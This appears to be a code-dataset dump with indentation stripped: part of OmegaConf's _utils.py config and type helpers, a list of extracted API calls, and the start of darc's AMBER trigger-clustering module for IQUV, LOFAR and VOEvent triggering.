d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def get_dataclass_field_names(obj: Any) -> List[str]:
return [field.name for field in dataclasses.fields(obj)]
def get_dataclass_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
d = {}
obj_type = get_type_of(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
resolved_hints = get_type_hints(obj_type)
for field in dataclasses.fields(obj):
name = field.name
is_optional, type_ = _resolve_optional(resolved_hints[field.name])
type_ = _resolve_forward(type_, obj.__module__)
if hasattr(obj, name):
value = getattr(obj, name)
if value == dataclasses.MISSING:
value = MISSING
else:
if field.default_factory == dataclasses.MISSING: # type: ignore
value = MISSING
else:
value = field.default_factory() # type: ignore
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def is_dataclass(obj: Any) -> bool:
from omegaconf.base import Node
if dataclasses is None or isinstance(obj, Node):
return False
return dataclasses.is_dataclass(obj)
def is_attr_class(obj: Any) -> bool:
from omegaconf.base import Node
if attr is None or isinstance(obj, Node):
return False
return attr.has(obj)
def is_structured_config(obj: Any) -> bool:
return is_attr_class(obj) or is_dataclass(obj)
def is_dataclass_frozen(type_: Any) -> bool:
return type_.__dataclass_params__.frozen # type: ignore
def is_attr_frozen(type_: type) -> bool:
# This is very hacky and probably fragile as well.
# Unfortunately currently there isn't an official API in attr that can detect that.
# noinspection PyProtectedMember
return type_.__setattr__ == attr._make._frozen_setattrs # type: ignore
def get_type_of(class_or_object: Any) -> Type[Any]:
type_ = class_or_object
if not isinstance(type_, type):
type_ = type(class_or_object)
assert isinstance(type_, type)
return type_
def is_structured_config_frozen(obj: Any) -> bool:
type_ = get_type_of(obj)
if is_dataclass(type_):
return is_dataclass_frozen(type_)
if is_attr_class(type_):
return is_attr_frozen(type_)
return False
def get_structured_config_field_names(obj: Any) -> List[str]:
if is_dataclass(obj):
return get_dataclass_field_names(obj)
elif is_attr_class(obj):
return get_attr_class_field_names(obj)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
def get_structured_config_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
if is_dataclass(obj):
return get_dataclass_data(obj, allow_objects=allow_objects)
elif is_attr_class(obj):
return get_attr_data(obj, allow_objects=allow_objects)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
class ValueKind(Enum):
VALUE = 0
MANDATORY_MISSING = 1
INTERPOLATION = 2
def _is_missing_value(value: Any) -> bool:
from omegaconf import Node
if isinstance(value, Node):
value = value._value()
return _is_missing_literal(value)
def _is_missing_literal(value: Any) -> bool:
# Uses literal '???' instead of the MISSING const for performance reasons.
return isinstance(value, str) and value == "???"
def _is_none(
value: Any, resolve: bool = False, throw_on_resolution_failure: bool = True
) -> bool:
from omegaconf import Node
if not isinstance(value, Node):
return value is None
if resolve:
value = value._maybe_dereference_node(
throw_on_resolution_failure=throw_on_resolution_failure
)
if not throw_on_resolution_failure and value is None:
# Resolution failure: consider that it is *not* None.
return False
assert isinstance(value, Node)
return value._is_none()
def get_value_kind(
value: Any, strict_interpolation_validation: bool = False
) -> ValueKind:
"""
Determine the kind of a value
Examples:
VALUE: "10", "20", True
MANDATORY_MISSING: "???"
INTERPOLATION: "${foo.bar}", "${foo.${bar}}", "${foo:bar}", "[${foo}, ${bar}]",
"ftp://${host}/path", "${foo:${bar}, [true], {'baz': ${baz}}}"
:param value: Input to classify.
:param strict_interpolation_validation: If `True`, then when `value` is a string
containing "${", it is parsed to validate the interpolation syntax. If `False`,
this parsing step is skipped: this is more efficient, but will not detect errors.
"""
if _is_missing_value(value):
return ValueKind.MANDATORY_MISSING
value = _get_value(value)
# We identify potential interpolations by the presence of "${" in the string.
# Note that escaped interpolations (ex: "esc: \${bar}") are identified as
# interpolations: this is intended, since they must be processed as interpolations
# for the string to be properly un-escaped.
# Keep in mind that invalid interpolations will only be detected when
# `strict_interpolation_validation` is True.
if isinstance(value, str) and "${" in value:
if strict_interpolation_validation:
# First try the cheap regex matching that detects common interpolations.
if SIMPLE_INTERPOLATION_PATTERN.match(value) is None:
# If no match, do the more expensive grammar parsing to detect errors.
parse(value)
return ValueKind.INTERPOLATION
else:
return ValueKind.VALUE
# DEPRECATED: remove in 2.2
def is_bool(st: str) -> bool:
st = str.lower(st)
return st == "true" or st == "false"
def is_float(st: str) -> bool:
try:
float(st)
return True
except ValueError:
return False
def is_int(st: str) -> bool:
try:
int(st)
return True
except ValueError:
return False
# DEPRECATED: remove in 2.2
def decode_primitive(s: str) -> Any:
if is_bool(s):
return str.lower(s) == "true"
if is_int(s):
return int(s)
if is_float(s):
return float(s)
return s
def is_primitive_list(obj: Any) -> bool:
from .base import Container
return not isinstance(obj, Container) and isinstance(obj, (list, tuple))
def is_primitive_dict(obj: Any) -> bool:
t = get_type_of(obj)
return t is dict
def is_dict_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Dict or type_ is Dict # pragma: no cover
else: # pragma: no cover
# type_dict is a bit hard to detect.
# this support is tentative, if it eventually causes issues in other areas it may be dropped.
typed_dict = hasattr(type_, "__base__") and type_.__base__ == dict
return origin is dict or typed_dict
def is_list_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is List or type_ is List # pragma: no cover
else:
return origin is list # pragma: no cover
def is_tuple_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Tuple or type_ is Tuple # pragma: no cover
else:
return origin is tuple # pragma: no cover
def is_dict_subclass(type_: Any) -> bool:
return type_ is not None and isinstance(type_, type) and issubclass(type_, Dict)
def is_dict(obj: Any) -> bool:
return is_primitive_dict(obj) or is_dict_annotation(obj) or is_dict_subclass(obj)
def is_primitive_container(obj: Any) -> bool:
return is_primitive_list(obj) or is_primitive_dict(obj)
def get_list_element_type(ref_type: Optional[Type[Any]]) -> Any:
args = getattr(ref_type, "__args__", None)
if ref_type is not List and args is not None and args[0]:
element_type = args[0]
else:
element_type = Any
return element_type
def get_dict_key_value_types(ref_type: Any) -> Tuple[Any, Any]:
args = getattr(ref_type, "__args__", None)
if args is None:
bases = getattr(ref_type, "__orig_bases__", None)
if bases is not None and len(bases) > 0:
args = getattr(bases[0], "__args__", None)
key_type: Any
element_type: Any
if ref_type is None or ref_type == Dict:
key_type = Any
element_type = Any
else:
if args is not None:
key_type = args[0]
element_type = args[1]
else:
key_type = Any
element_type = Any
return key_type, element_type
def valid_value_annotation_type(type_: Any) -> bool:
return type_ is Any or is_primitive_type(type_) or is_structured_config(type_)
def _valid_dict_key_annotation_type(type_: Any) -> bool:
from omegaconf import DictKeyType
return type_ is None or type_ is Any or issubclass(type_, DictKeyType.__args__) # type: ignore
def is_primitive_type(type_: Any) -> bool:
type_ = get_type_of(type_)
return issubclass(type_, Enum) or type_ in (int, float, bool, str, type(None))
def _is_interpolation(v: Any, strict_interpolation_validation: bool = False) -> bool:
if isinstance(v, str):
ret = (
get_value_kind(v, strict_interpolation_validation)
== ValueKind.INTERPOLATION
)
assert isinstance(ret, bool)
return ret
return False
def _get_value(value: Any) -> Any:
from .base import Container
from .nodes import ValueNode
if isinstance(value, ValueNode):
return value._value()
elif isinstance(value, Container):
boxed = value._value()
if boxed is None or _is_missing_literal(boxed) or _is_interpolation(boxed):
return boxed
# return primitives and regular OmegaConf Containers as is
return value
def get_ref_type(obj: Any, key: Any = None) -> Optional[Type[Any]]:
from omegaconf import Container, Node
if isinstance(obj, Container):
if key is not None:
obj = obj._get_node(key)
else:
if key is not None:
raise ValueError("Key must only be provided when obj is a container")
if isinstance(obj, Node):
ref_type = obj._metadata.ref_type
if obj._is_optional() and ref_type is not Any:
return Optional[ref_type] # type: ignore
else:
return ref_type
else:
return Any # type: ignore
def _raise(ex: Exception, cause: Exception) -> None:
# Set the environment variable OC_CAUSE=1 to get a stacktrace that includes the
# causing exception.
env_var = os.environ["OC_CAUSE"] if "OC_CAUSE" in os.environ else None
debugging = sys.gettrace() is not None
full_backtrace = (debugging and not env_var == "0") or (env_var == "1")
if full_backtrace:
ex.__cause__ = cause
else:
ex.__cause__ = None
raise ex.with_traceback(sys.exc_info()[2]) # set end OC_CAUSE=1 for full backtrace
def format_and_raise(
node: Any,
key: Any,
value: Any,
msg: str,
cause: Exception,
type_override: Any = None,
) -> None:
from omegaconf import OmegaConf
from omegaconf.base import Node
if isinstance(cause, AssertionError):
raise
if isinstance(cause, OmegaConfBaseException) and cause._initialized:
ex = cause
if type_override is not None:
ex = type_override(str(cause))
ex.__dict__ = copy.deepcopy(cause.__dict__)
_raise(ex, cause)
object_type: Optional[Type[Any]]
object_type_str: Optional[str] = None
ref_type: Optional[Type[Any]]
ref_type_str: Optional[str]
child_node: Optional[Node] = None
if node is None:
full_key = key if key is not None else ""
object_type = None
ref_type = None
ref_type_str = None
else:
if key is not None and not node._is_none():
child_node = node._get_node(key, validate_access=False)
try:
full_key = node._get_full_key(key=key)
except Exception as exc:
# Since we are handling an exception, raising a different one here would
# be misleading. Instead, we display it in the key.
full_key = f"<unresolvable due to {type(exc).__name__}: {exc}>"
object_type = OmegaConf.get_type(node)
object_type_str = type_str(object_type)
ref_type = get_ref_type(node)
ref_type_str = type_str(ref_type)
msg = string.Template(msg).safe_substitute(
REF_TYPE=ref_type_str,
OBJECT_TYPE=object_type_str,
KEY=key,
FULL_KEY=full_key,
VALUE=value,
VALUE_TYPE=type_str(type(value), include_module_name=True),
KEY_TYPE=f"{type(key).__name__}",
)
if ref_type not in (None, Any):
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
reference_type=$REF_TYPE
object_type=$OBJECT_TYPE"""
)
else:
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
object_type=$OBJECT_TYPE"""
)
s = string.Template(template=template)
message = s.substitute(
REF_TYPE=ref_type_str, OBJECT_TYPE=object_type_str, MSG=msg, FULL_KEY=full_key
)
exception_type = type(cause) if type_override is None else type_override
if exception_type == TypeError:
exception_type = ConfigTypeError
elif exception_type == IndexError:
exception_type = ConfigIndexError
ex = exception_type(f"{message}")
if issubclass(exception_type, OmegaConfBaseException):
ex._initialized = True
ex.msg = message
ex.parent_node = node
ex.child_node = child_node
ex.key = key
ex.full_key = full_key
ex.value = value
ex.object_type = object_type
ex.object_type_str = object_type_str
ex.ref_type = ref_type
ex.ref_type_str = ref_type_str
_raise(ex, cause)
def type_str(t: Any, include_module_name: bool = False) -> str:
is_optional, t = _resolve_optional(t)
if t is None:
return type(t).__name__
if t is Any:
return "Any"
if t is ...:
return "..."
if sys.version_info < (3, 7, 0): # pragma: no cover
# Python 3.6
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t.__origin__ is not None:
name = type_str(t.__origin__)
else:
name = str(t)
if name.startswith("typing."):
name = name[len("typing.") :]
else: # pragma: no cover
# Python >= 3.7
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t._name is None:
if t.__origin__ is not None:
name = type_str(
t.__origin__, include_module_name=include_module_name
)
else:
name = str(t._name)
args = getattr(t, "__args__", None)
if args is not None:
args = ", ".join(
[type_str(t, include_module_name=include_module_name) for t in t.__args__]
)
ret = f"{name}[{args}]"
else:
ret = name
if include_module_name:
if (
hasattr(t, "__module__")
and t.__module__ != "builtins"
and t.__module__ != "typing"
and not t.__module__.startswith("omegaconf.")
):
module_prefix = t.__module__ + "."
else:
module_prefix = ""
ret = module_prefix + ret
if is_optional:
return f"Optional[{ret}]"
else:
return ret
def _ensure_container(target: Any, flags: Optional[Dict[str, bool]] = None) -> Any:
from omegaconf import OmegaConf
if is_primitive_container(target):
assert isinstance(target, (list, dict))
target = OmegaConf.create(target, flags=flags)
elif is_structured_config(target):
target = OmegaConf.structured(target, flags=flags)
elif not OmegaConf.is_config(target):
raise ValueError(
"Invalid input. Supports one of "
+ "[dict,list,DictConfig,ListConfig,dataclass,dataclass instance,attr class,attr class instance]"
)
return target
def is_generic_list(type_: Any) -> bool:
"""
Checks if a type is a generic list, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_list_annotation(type_) and get_list_element_type(type_) is not None
def is_generic_dict(type_: Any) -> bool:
"""
Checks if a type is a generic dict, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_dict_annotation(type_) and len(get_dict_key_value_types(type_)) > 0
def is_container_annotation(type_: Any) -> bool:
return is_list_annotation(type_) or is_dict_annotation(type_)
def split_key(key: str) -> List[str]:
"""
Split a full key path into its individual components.
This is similar to `key.split(".")` but also works with the getitem syntax:
"a.b" -> ["a", "b"]
"a[b]" -> ["a, "b"]
".a.b[c].d" -> ["", "a", "b", "c", "d"]
"[a].b" -> ["a", "b"]
"""
# Obtain the first part of the key (in docstring examples: a, a, .a, '')
first = KEY_PATH_HEAD.match(key)
assert first is not None
first_stop = first.span()[1]
# `tokens` will contain all elements composing the key.
tokens = key[0:first_stop].split(".")
# Optimization in case `key` has no other component: we are done.
if first_stop == len(key):
return tokens
if key[first_stop] == "[" and not tokens[-1]:
# This is a special case where the first key starts with brackets, e.g.
# [a] or ..[a]. In that case there is an extra "" in `tokens` that we
# need to get rid of:
# [a] -> tokens = [""] but we would like []
# ..[a] -> tokens = ["", "", ""] but we would like ["", ""]
tokens.pop()
# Identify other key elements (in docstring examples: b, b, b/c/d, b)
others = KEY_PATH_OTHER.findall(key[first_stop:])
# There are two groups in the `KEY_PATH_OTHER` regex: one for keys starting
# with a dot (.b, .d) and one for keys starting with a bracket ([b], [c]).
# Only one group can be non-empty.
tokens += [dot_key if dot_key else bracket_key for dot_key, bracket_key in others]
return tokens
# Similar to Python 3.7+'s `contextlib.nullcontext` (which should be used instead,
# once support for Python 3.6 is dropped).
@contextmanager
def nullcontext(enter_result: Any = None) -> Iterator[Any]:
yield enter_result
| [((53, 16, 53, 42), 're.compile', 're.compile', ({(53, 27, 53, 41): '"""(\\\\.)*[^.[]*"""'}, {}), "('(\\\\.)*[^.[]*')", False, 'import re\n'), ((58, 17, 58, 52), 're.compile', 're.compile', ({(58, 28, 58, 51): '"""\\\\.([^.[]*)|\\\\[(.*?)\\\\]"""'}, {}), "('\\\\.([^.[]*)|\\\\[(.*?)\\\\]')", False, 'import re\n'), ((171, 10, 171, 36), 'importlib.import_module', 'import_module', ({(171, 24, 171, 35): 'module_path'}, {}), '(module_path)', False, 'from importlib import import_module\n'), ((292, 19, 292, 52), 'omegaconf.OmegaConf.create', 'OmegaConf.create', (), '', False, 'from omegaconf import OmegaConf\n'), ((341, 19, 341, 52), 'omegaconf.OmegaConf.create', 'OmegaConf.create', (), '', False, 'from omegaconf import OmegaConf\n'), ((343, 21, 343, 45), 'typing.get_type_hints', 'get_type_hints', ({(343, 36, 343, 44): 'obj_type'}, {}), '(obj_type)', False, 'from typing import Any, Dict, Iterator, List, Optional, Tuple, Type, Union, get_type_hints\n'), ((344, 17, 344, 40), 'dataclasses.fields', 'dataclasses.fields', ({(344, 36, 344, 39): 'obj'}, {}), '(obj)', False, 'import dataclasses\n'), ((388, 11, 388, 40), 'dataclasses.is_dataclass', 'dataclasses.is_dataclass', ({(388, 36, 388, 39): 'obj'}, {}), '(obj)', False, 'import dataclasses\n'), ((396, 11, 396, 24), 'attr.has', 'attr.has', ({(396, 20, 396, 23): 'obj'}, {}), '(obj)', False, 'import attr\n'), ((796, 8, 796, 42), 'string.Template', 'string.Template', (), '', False, 'import string\n'), ((144, 8, 153, 9), 're.compile', 're.compile', ({(145, 12, 151, 32): '"""^(?:\n [-+]?(?:[0-9][0-9_]*)\\\\.[0-9_]*(?:[eE][-+]?[0-9]+)?\n |[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)\n |\\\\.[0-9_]+(?:[eE][-+][0-9]+)?\n |[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\\\.[0-9_]*\n |[-+]?\\\\.(?:inf|Inf|INF)\n |\\\\.(?:nan|NaN|NAN))$"""', (152, 12, 152, 16): 're.X'}, {}), '(\n """^(?:\n [-+]?(?:[0-9][0-9_]*)\\\\.[0-9_]*(?:[eE][-+]?[0-9]+)?\n |[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)\n |\\\\.[0-9_]+(?:[eE][-+][0-9]+)?\n |[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\\\.[0-9_]*\n |[-+]?\\\\.(?:inf|Inf|INF)\n |\\\\.(?:nan|NaN|NAN))$"""\n , re.X)', False, 'import re\n'), ((243, 8, 249, 9), 'warnings.warn', 'warnings.warn', (), '', False, 'import warnings\n'), ((279, 16, 279, 42), 'attr.fields_dict', 'attr.fields_dict', ({(279, 33, 279, 41): 'obj_type'}, {}), '(obj_type)', False, 'import attr\n'), ((713, 16, 713, 30), 'sys.gettrace', 'sys.gettrace', ({}, {}), '()', False, 'import sys\n'), ((765, 22, 765, 46), 'omegaconf.OmegaConf.get_type', 'OmegaConf.get_type', ({(765, 41, 765, 45): 'node'}, {}), '(node)', False, 'from omegaconf import OmegaConf\n'), ((782, 19, 788, 9), 'textwrap.dedent', 'dedent', ({(783, 12, 787, 43): '""" $MSG\n full_key: $FULL_KEY\n reference_type=$REF_TYPE\n object_type=$OBJECT_TYPE"""'}, {}), '(\n """ $MSG\n full_key: $FULL_KEY\n reference_type=$REF_TYPE\n object_type=$OBJECT_TYPE"""\n )', False, 'from textwrap import dedent\n'), ((790, 19, 795, 9), 'textwrap.dedent', 'dedent', ({(791, 12, 794, 43): '""" $MSG\n full_key: $FULL_KEY\n object_type=$OBJECT_TYPE"""'}, {}), '(\n """ $MSG\n full_key: $FULL_KEY\n object_type=$OBJECT_TYPE"""\n )', False, 'from textwrap import dedent\n'), ((887, 17, 887, 54), 'omegaconf.OmegaConf.create', 'OmegaConf.create', (), '', False, 'from omegaconf import OmegaConf\n'), ((295, 24, 295, 50), 'attr.fields_dict', 'attr.fields_dict', ({(295, 41, 295, 49): 'obj_type'}, {}), '(obj_type)', False, 'import attr\n'), ((311, 22, 317, 13), 'omegaconf.omegaconf._maybe_wrap', '_maybe_wrap', (), '', False, 'from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap\n'), ((330, 36, 330, 59), 'dataclasses.fields', 'dataclasses.fields', ({(330, 55, 330, 58): 'obj'}, {}), '(obj)', False, 'import dataclasses\n'), ((365, 22, 371, 13), 'omegaconf.omegaconf._maybe_wrap', '_maybe_wrap', (), '', False, 'from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap\n'), ((719, 28, 719, 42), 'sys.exc_info', 'sys.exc_info', ({}, {}), '()', False, 'import sys\n'), ((740, 26, 740, 55), 'copy.deepcopy', 'copy.deepcopy', ({(740, 40, 740, 54): 'cause.__dict__'}, {}), '(cause.__dict__)', False, 'import copy\n'), ((771, 10, 771, 30), 'string.Template', 'string.Template', ({(771, 26, 771, 29): 'msg'}, {}), '(msg)', False, 'import string\n'), ((889, 17, 889, 58), 'omegaconf.OmegaConf.structured', 'OmegaConf.structured', (), '', False, 'from omegaconf import OmegaConf\n'), ((890, 13, 890, 40), 'omegaconf.OmegaConf.is_config', 'OmegaConf.is_config', ({(890, 33, 890, 39): 'target'}, {}), '(target)', False, 'from omegaconf import OmegaConf\n'), ((132, 26, 137, 21), 'yaml.constructor.ConstructorError', 'yaml.constructor.ConstructorError', ({(133, 24, 133, 54): '"""while constructing a mapping"""', (134, 24, 134, 39): 'node.start_mark', (135, 24, 135, 63): 'f"""found duplicate key {key_node.value}"""', (136, 24, 136, 43): 'key_node.start_mark'}, {}), "('while constructing a mapping', node.\n start_mark, f'found duplicate key {key_node.value}', key_node.start_mark)", False, 'import yaml\n'), ((260, 43, 266, 17), 'omegaconf.omegaconf._maybe_wrap', '_maybe_wrap', (), '', False, 'from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap\n')] |
loostrum/darc | darc/amber_clustering.py | 977f43652ff4fc873340d09ac0fddeb81b889541 | #!/usr/bin/env python3
#
# AMBER Clustering
import os
from time import sleep
import yaml
import ast
import threading
import multiprocessing as mp
import numpy as np
from astropy.time import Time, TimeDelta
import astropy.units as u
from astropy.coordinates import SkyCoord
from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer
from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT
from darc.external import tools
from darc import util
class AMBERClusteringException(Exception):
pass
class AMBERClustering(DARCBase):
"""
Trigger IQUV / LOFAR / VOEvent system based on AMBER candidates
1. Cluster incoming triggers
2. Apply thresholds (separate for known and new sources, and for IQUV vs LOFAR)
3. Put IQUV triggers on output queue
4. Put LOFAR triggers on remote LOFAR trigger queue and on VOEvent queue
"""
def __init__(self, *args, connect_vo=True, connect_lofar=True, **kwargs):
"""
:param bool connect_vo: Whether or not to connect to VOEvent queue on master node
:param bool connect_lofar: Whether or not to connect to LOFAR trigger queue on master node
"""
super(AMBERClustering, self).__init__(*args, **kwargs)
self.connect_vo = connect_vo
self.connect_lofar = connect_lofar
self.dummy_queue = mp.Queue()
self.threads = {}
self.hdr_mapping = {}
self.obs_config = None
self.observation_running = False
self.amber_triggers = []
self.source_list = None
self.lock = mp.Lock()
# store when we are allowed to do IQUV / LOFAR triggering
self.time_iquv = Time.now()
# connect to VOEvent generator
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
else:
# dummy queue
self.logger.info("VO Generator connection disabled, setting dummy queue")
self.vo_queue = mp.Queue()
self.have_vo = False
# connect to LOFAR trigger
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
else:
# dummy queue
self.logger.info("LOFAR Trigger connection disabled, setting dummy queue")
self.lofar_queue = mp.Queue()
self.have_lofar = False
def _load_source_list(self):
"""
Load the list with known source DMs
:return: source list with dict per category
"""
try:
with open(self.source_file, 'r') as f:
source_list = yaml.load(f, Loader=yaml.SafeLoader)
except OSError as e:
raise AMBERClusteringException("Cannot load source list: {}".format(e))
return source_list
def process_command(self, command):
"""
Process command received from queue
:param dict command: Command to process
"""
if command['command'] == 'trigger':
if not self.observation_running:
self.logger.error("Trigger(s) received but no observation is running - ignoring")
else:
with self.lock:
self.amber_triggers.append(command['trigger'])
elif command['command'] == 'get_attr':
self.get_attribute(command)
else:
self.logger.error("Unknown command received: {}".format(command['command']))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start listening for amber triggers on queue
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# clean any old triggers
self.amber_triggers = []
# parse parset
obs_config['parset'] = self._load_parset(obs_config)
# set config
self.obs_config = obs_config
self.observation_running = True
# (re)load source list in case of changes
self.source_list = self._load_source_list()
# try connecting to VO server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
# try connecting to LOFAR trigger serverr if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
# process triggers in thread
self.threads['processing'] = threading.Thread(target=self._process_triggers)
self.threads['processing'].start()
self.logger.info("Observation started")
def stop_observation(self, *args, **kwargs):
"""
Stop observation
"""
# set running to false
self.observation_running = False
# clear triggers
self.amber_triggers = []
# clear header
self.hdr_mapping = {}
# clear config
self.obs_config = None
# clear threads
for key, thread in self.threads.items():
if thread is not None:
thread.join()
self.threads[key] = None
def voevent_connector(self):
"""
Connect to the VOEvent generator on the master node
"""
# Load VO server settings
VOEventQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['voevent_generator']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = VOEventQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def lofar_connector(self):
"""
Connect to the LOFAR triggering system on the master node
"""
# Load LOFAR trigger server settings
LOFARTriggerQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['lofar_trigger']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = LOFARTriggerQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def _get_source(self):
"""
Try to get DM for a known source
:return: DM for known source, else None
"""
# get source name from parset
try:
source = self.obs_config['parset']['task.source.name']
except KeyError:
self.logger.error("Cannot get source name from parset, will not do known-source triggering")
return None, None, None
# check if source is in source list
# first check aliases
try:
alias = self.source_list['aliases'][source]
except KeyError:
# not found
pass
else:
# replace source by alias so we can look it up in other lists
self.logger.info("Using alias {} for source {}".format(alias, source))
source = alias
# check if source is a known pulsar or frb
dm_src = None
src_type = None
for key in ['pulsars', 'frbs']:
try:
dm_src = self.source_list[key][source]
src_type = key[:-1]
except KeyError:
pass
else:
break
return dm_src, src_type, source
def _check_triggers(self, triggers, sys_params, utc_start, datetimesource, dm_min=0, dm_max=np.inf, dm_src=None,
width_max=np.inf, snr_min=8, src_type=None, src_name=None, dmgal=0, pointing=None,
skip_lofar=False):
"""
Cluster triggers and run IQUV and/or LOFAR triggering
:param list triggers: Raw triggers
:param dict sys_params: System parameters (dt, delta_nu_MHz, nu_GHz)
:param str utc_start: start time of observation, in format readable by astropy.time.Time
:param str datetimesource: Field name with date and time
:param float dm_min: minimum DM (default: 0)
:param float dm_max: maximum DM (default: inf)
:param float dm_src: DM of known source (default: None)
:param float width_max: maximum width (default: inf)
:param float snr_min: mininum S/N (default: 8)
:param str src_type: Source type (pulsar, frb, None)
:param str src_name: Source name (default: None)
:param float dmgal: galactic maximum DM
:param astropy.coordinates.SkyCoord pointing: Pointing for LOFAR triggering (default: None)
:param bool skip_lofar: Skip LOFAR triggering (default: False)
"""
# cluster using IQUV thresholds
# LOFAR thresholds are assumed to be more strict for every parameter
cluster_snr, cluster_dm, cluster_time, cluster_downsamp, cluster_sb, _, ncand_per_cluster = \
tools.get_triggers(triggers,
dm_min=dm_min, dm_max=dm_max, sig_thresh=snr_min, t_window=self.clustering_window,
read_beam=True, return_clustcounts=True, sb_filter=self.sb_filter,
sb_filter_period_min=self.sb_filter_period_min,
sb_filter_period_max=self.sb_filter_period_max,
**sys_params)
# select on width
mask = np.array(cluster_downsamp) <= width_max
cluster_snr = np.array(cluster_snr)[mask]
cluster_dm = np.array(cluster_dm)[mask]
cluster_time = np.array(cluster_time)[mask]
cluster_downsamp = np.array(cluster_downsamp)[mask].astype(int)
cluster_sb = np.array(cluster_sb)[mask].astype(int)
ncand_per_cluster = np.array(ncand_per_cluster)[mask].astype(int)
ncluster = len(cluster_snr)
if src_type is not None:
known = 'known'
else:
known = 'new'
self.logger.info("Clustered {} raw triggers into {} IQUV trigger(s) "
"for {} source".format(len(triggers), ncluster, known))
# return if there are no clusters
if ncluster == 0:
return
# there are clusters, do IQUV triggering
# check if we can do triggering
now = Time.now()
if now < self.time_iquv:
self.logger.warning("Cannot trigger IQUV yet, next possible time: {}".format(self.time_iquv))
else:
self.logger.info("Sending IQUV trigger")
# update last trigger time
self.time_iquv = now + TimeDelta(self.thresh_iquv['interval'], format='sec')
# trigger IQUV
dada_triggers = []
for i in range(ncluster):
# send known source dm if available
if dm_src is not None:
dm_to_send = dm_src
else:
dm_to_send = cluster_dm[i]
dada_trigger = {'stokes': 'IQUV', 'dm': dm_to_send, 'beam': cluster_sb[i],
'width': cluster_downsamp[i], 'snr': cluster_snr[i],
'time': cluster_time[i], 'utc_start': utc_start}
dada_triggers.append(dada_trigger)
self.target_queue.put({'command': 'trigger', 'trigger': dada_triggers})
# skip LOFAR triggering for pulsars or if explicitly disabled
if src_type == 'pulsar' or skip_lofar:
return
# select LOFAR thresholds
if src_type is not None:
# known source, use same DM threshold as IQUV, but apply width and S/N thresholds
# DM_min effectively does nothing here because the value is the same as for IQUV
# but it needs to be defined for the mask = line below to work
# no limit on candidates per cluster
